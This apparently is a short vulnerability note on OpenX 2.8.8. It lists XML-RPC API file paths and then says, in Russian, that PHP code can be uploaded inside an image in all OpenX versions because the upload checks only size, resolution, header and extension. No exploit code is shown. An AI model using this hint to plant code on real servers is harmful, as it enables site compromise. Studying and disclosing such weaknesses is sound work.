openx288/www/api/v1/xmlrpc/BannerServiceImpl.php

openx288/www/api/v1/xmlrpc/CampaignServiceImpl.php

openx288/www/api/v1/xmlrpc/LogonServiceImpl.php

openx288/www/api/v1/xmlrpc/PublisherServiceImpl.php

openx288/www/api/v1/xmlrpc/UserServiceImpl.php

openx288/www/api/v1/xmlrpc/ZoneServiceImpl.php

openx288/www/api/v2/common/BaseAdvertiserService.php

openx288/www/api/v2/common/BaseAgencyService.php

openx288/www/api/v2/common/BaseBannerService.php

openx288/www/api/v2/common/BaseCampaignService.php

openx288/www/api/v2/common/BaseChannelService.php

openx288/www/api/v2/common/BaseLogonService.php

openx288/www/api/v2/common/BasePublisherService.php

openx288/www/api/v2/common/BaseServiceImpl.php

openx288/www/api/v2/common/BaseTrackerService.php

openx288/www/api/v2/common/BaseUserService.php

openx288/www/api/v2/common/BaseVariableService.php

openx288/www/api/v2/common/BaseZoneService.php

openx288/www/api/v2/common/XmlRpcUtils.php

openx288/www/api/v2/xmlrpc/AdvertiserServiceImpl.php

openx288/www/api/v2/xmlrpc/AgencyServiceImpl.php

openx288/www/api/v2/xmlrpc/BannerServiceImpl.php

openx288/www/api/v2/xmlrpc/CampaignServiceImpl.php

openx288/www/api/v2/xmlrpc/ChannelServiceImpl.php

openx288/www/api/v2/xmlrpc/LogonServiceImpl.php

openx288/www/api/v2/xmlrpc/PublisherServiceImpl.php

openx288/www/api/v2/xmlrpc/TrackerServiceImpl.php

openx288/www/api/v2/xmlrpc/UserServiceImpl.php

openx288/www/api/v2/xmlrpc/VariableServiceImpl.php

openx288/www/api/v2/xmlrpc/ZoneServiceImpl.php

Актуально во всех версиях OpenX.

Загрузка php-кода внутри картинки.

Единственные проверки файла это размер,разрешение, заголовок и расширение.